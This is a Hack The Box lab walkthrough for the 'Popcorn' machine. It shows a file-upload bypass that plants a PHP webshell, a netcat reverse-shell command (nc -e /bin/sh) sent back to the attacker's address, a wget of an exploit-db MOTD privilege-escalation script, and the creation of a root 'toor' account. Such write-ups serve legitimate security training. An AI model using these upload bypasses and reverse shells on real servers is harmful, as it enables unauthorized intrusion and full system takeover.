twitter

Hack The Box: Popcorn

Difficulty: Medium
Machine Creator: ch4p
Tools Used:

NMAP
Gobuster
Searchsploit
PHP
Burp Suite
Python

Task: To find User.txt and Root.txt
Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.6


Looking at the NMAP scan results, we can see Apache running on port 80, and this is an Ubuntu server.

 

HTTP


We can open this page up in a browser, and there is only the default apache page.

 

Gobuster

We have verified that there is a web server we can start with scanning for directories in the website.

gobuster -u http://10.10.10.6 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40


The gobuster has an interesting directory “/torrent.” Let’s check this out.

 

HTTP


This looks interesting a website for hosting torrents.

 

Searchsploit

A searchsploit search shows that the Torrent Hoster webpage is vulnerable to uploads.

 

Torrent Hoster


The upload section requires a login. It may be possible to brute force the login, but let’s see if there is anyway else to log in.

 


The system does allow us to signup.

 


We can successfully create an account for the torrent hoster login.

 


We can access the upload page let’s see what types of files are accepted.

 


I’ve tried to upload a php reverse shell and received an error. Let’s try to upload a torrent file.

 


The torrent file was successful. I also noticed that we could edit the screenshots on this page lets give that a try.

 

Here I’ve uploaded a new logo for our kali torrent.

 


We can see that there is an upload directory which contains screenshots.


If we click on the file, we can see that it is, in fact, the screenshot that was uploaded.


If we look at the torrent page, we can see the screenshot is also updated.

Burp Suite

I’m starting the burp suite by repeating the same process of uploading the screenshot while using burp as a proxy.


In the history of the upload, we can see the post request and the contents of the image in the raw section below.
In Linux, the file type association is not performed by the extension but the first section of the file data.

 


Here I am selecting the first part of the file data and converting it to base64 encoded.


We need to copy the base64 code.

echo <Base64 Hash> |base64 -d > file


I want to verify how this registers, so let’s decode the base64 string and echo it to a file without an extension. Then using the file command, we can see the association.

Exploit upload

Now we can start on uploading an exploit to this server.


Let’s start by sending this post request to the repeater. Right click on the post request and “send to repeater.”

 


For our exploit in repeater we want to remove enough of the image data, so Linux will still think that this is an image file. However, we will also add some php code to create the exploit. We also want to add php as the file extension. Having the .jpg still in the file will allow the upload because the system looks for .jpg in the name but does not require it to be the extension.

 


When we hit go, we can see that there is a 200 OK response and the jpg/php file was uploaded.

 


Going back to the upload directory the new php file is there.

 


When we go to this php page, it will error this is normal.

 


We can add “?exploit=whoami” to the URL, and we have remote code execution.

Reverse Shell

We need to set up our local netcat listener

nc -lvnp 1234

In the url, we can execute netcat on the remote server by replacing the whoami with the netcat command

http://10.10.10.6/torrent/upload/1a17df934566f21b12489987f070671223b23a9d.php?exploit=nc%20-e%20/bin/sh%2010.10.14.11%201234


Here I am adding the netcat command to the url.

 


Once we do the remote code execution again with the netcat command, we are now connected to the remote machine.

 

python -c ‘import pty; pty.spawn(“/bin/sh”)’


The connection we had was useless we need to upgrade to a TTY shell we can do this with the python command and get a proper TTY shell.

User.txt


With our user shell, we can read the contents of the user.txt file.

 

Privilege Escalation

ls -a


In the user directory if we view the hidden contents using the “ls -a” command.


While looking around in the hidden .cache directory, I found a message of the day file. MOTD is a known exploitable.


A search on exploitdb we see there are privilege escalation exploits of MOTD.

 

wget http://www.exploit-db.com/download/14339.sh


We need to get the exploit over to the remote server. First, we can download the file locally and then start a Python HTTP server. Once we have the HTTP server up, we can download from our local machine to the remote system using wget.

Exploitation Error


As I was attempting to run this exploit, it keeps having errors. After researching it appears that copying the file causes issues so let’s see if we can improve this shell so we can manually edit the file. (VI won’t work in this session)

Python PTY Shells

https://github.com/infodox/python-pty-shells
git clone https://github.com/infodox/python-pty-shells.git

 


To help us with our issue we can use a python pty shell. A quick google search brought me to this git hub repository that we can clone.

 


We want to use the tcp_pty_backconnect.py this will give us a reverse shell from the remote host. We need to edit and add in our local address.

 


Now we need to copy our python script to the remote server. We can do this like before with our python HTTP server and wget.

 


We need to set up a new netcat listener on port 31337 on our local machine, and then we can execute the python script on the remote system which gives us a PTY shell.

 


With our new PTY shell, we can edit a new file and paste the contents from our exploit.

 


When I run the exploit file this time it works (There was an error at the end probably my fault), we can see that this exploit modifies the passwd (Users file) and the shadow file (Password Hashes) to create a new user called toor with the password of toor.

SSH


With the exploit completed and the new toor account created we can ssh into this machine using the username toor and the password toor which will run as root.

Root.txt


With the root access now we can read the root.txt.